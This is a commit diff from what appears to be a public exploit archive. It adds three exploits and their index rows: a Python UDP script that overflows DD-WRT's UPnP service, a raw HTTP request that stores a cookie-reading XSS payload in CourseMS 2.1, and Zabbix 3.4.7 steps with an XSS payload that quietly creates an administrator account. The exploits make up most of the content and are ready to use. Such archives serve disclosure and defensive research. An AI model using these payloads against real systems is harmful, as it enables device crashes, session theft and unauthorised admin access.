DB: 2021-04-01

3 changes to exploits/shellcodes DD-WRT 45723 - UPNP Buffer Overflow (PoC) Zabbix 3.4.7 - Stored XSS CourseMS 2.1 - 'name' Stored XSS
2021-04-01 05:02:01 +00:00 · 2021-04-01 05:02:01 +00:00 · 3145bbcf80
commit 3145bbcf80
parent 4c9eccdc6d
4 changed files with 73 additions and 0 deletions
--- a/exploits/hardware/dos/49730.py
+++ b/exploits/hardware/dos/49730.py
@ -0,0 +1,28 @@
+# Exploit Title: DD-WRT 45723 - UPNP Buffer Overflow (PoC)
+# Date: 24.03.2021
+# Exploit Author: Selim Enes 'Enesdex' Karaduman
+# Vendor Homepage: https://dd-wrt.com/
+# Software Link: https://download1.dd-wrt.com/dd-wrtv2/downloads/betas/2021/
+# Version: 45723 or prior
+# Tested on: TP-Link Archer C7
+
+# https://ssd-disclosure.com/ssd-advisory-dd-wrt-upnp-buffer-overflow/
+
+import socket
+
+target_ip = "192.168.2.1" # IP Address of Target
+off = "D"*164
+ret_addr = "AAAA" 
+
+payload = off + ret_addr
+
+packet = \
+    'M-SEARCH * HTTP/1.1\r\n' \
+    'HOST:239.255.255.250:1900\r\n' \
+    'ST:uuid:'+payload+'\r\n' \
+    'MX:2\r\n' \
+    'MAN:"ssdp:discover"\r\n' \
+    '\r\n'
+
+s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
+s.sendto(packet, (target_ip, 1900) )
--- a/exploits/multiple/webapps/49731.txt
+++ b/exploits/multiple/webapps/49731.txt
@ -0,0 +1,26 @@
+# Exploit Title: CourseMS 2.1 - 'name' Stored XSS
+# Date: 03/30/2021
+# Exploit Author: cptsticky
+# Vendor Homepage: http://sourceforge.net/projects/coursems
+# Software Link: https://sourceforge.net/projects/coursems/files/latest/download
+# Version: 2.1
+# Tested on: Ubuntu 20.04
+
+POST /coursems/admin/add_jobs.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 91
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/coursems/admin/add_jobs.php
+Cookie: PHPSESSID=9c5cgusplbmb09g86sfapoiie4; __utma=2772400.1964691305.1617119061.1617119061.1617119061.1; __utmb=2772400.87.10.1617119061; __utmc=2772400; __utmz=2772400.1617119061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
+Upgrade-Insecure-Requests: 1
+
+name=dirkgently%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&add_jobs=Add+Job+Title
+
+
+Anyone who visits the http://localhost/coursems/add_user.php will prompt execution of the stored XSS
--- a/exploits/php/webapps/49729.txt
+++ b/exploits/php/webapps/49729.txt
@ -0,0 +1,16 @@
+# Exploit Title: Zabbix 3.4.7 - Stored XSS
+# Date: 30-03-2021
+# Exploit Author: Radmil Gazizov
+# Vendor Homepage: https://www.zabbix.com/
+# Software Link: https://www.zabbix.com/rn/rn3.4.7
+# Version: 3.4.7
+# Tested on: Linux
+
+# Reference -
+https://github.com/GloryToMoon/POC_codes/blob/main/zabbix_stored_xss_347.txt
+
+1- Go to /zabbix/zabbix.php?action=dashboard.list (anonymous login CVE-2019-17382)
+2- Create new dashboard
+3- Add a new widget => Type: Map nabigation tree
+4- Past into parameter "Name": <img src="x" onerror="var n='hck',q=jQuery;q.post('users.php',{sid:q('#sid').attr('value'),form:'Create+user',alias:n,name:n,surname:n,'user_groups[]':7,password1:n,password2:n,theme:'default',refresh:'9s',rows_per_page:9,url:'',user_type:3,add:'Add'});">
+5- Click to "Add" button
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -6776,6 +6776,7 @@ id,file,description,date,author,type,platform,port
 49638,exploits/windows/dos/49638.py,"Nsasoft Hardware Software Inventory 1.6.4.0 - 'multiple' Denial of Service (PoC)",2021-03-11,"Enes Özeser",dos,windows,
 49685,exploits/hardware/dos/49685.txt,"KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Device Reboot (Unauthenticated)",2021-03-19,LiquidWorm,dos,hardware,
 49697,exploits/multiple/dos/49697.py,"ProFTPD 1.3.7a - Remote Denial of Service",2021-03-22,xynmaps,dos,multiple,
+49730,exploits/hardware/dos/49730.py,"DD-WRT 45723 - UPNP Buffer Overflow (PoC)",2021-03-31,Enesdex,dos,hardware,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -43907,3 +43908,5 @@ id,file,description,date,author,type,platform,port
 49724,exploits/java/webapps/49724.txt,"Novel Boutique House-plus 3.5.1 - Arbitrary File Download",2021-03-29,tuyiqiang,webapps,java,
 49725,exploits/windows/webapps/49725.py,"SyncBreeze 10.1.16 - XML Parsing Stack-based Buffer Overflow",2021-03-29,"Filipe Oliveira",webapps,windows,
 49727,exploits/multiple/webapps/49727.txt,"Openlitespeed 1.7.9 - 'Notes' Stored Cross-Site Scripting",2021-03-30,cmOs,webapps,multiple,
+49729,exploits/php/webapps/49729.txt,"Zabbix 3.4.7 - Stored XSS",2021-03-31,"Radmil Gazizov",webapps,php,
+49731,exploits/multiple/webapps/49731.txt,"CourseMS 2.1 - 'name' Stored XSS",2021-03-31,cptsticky,webapps,multiple,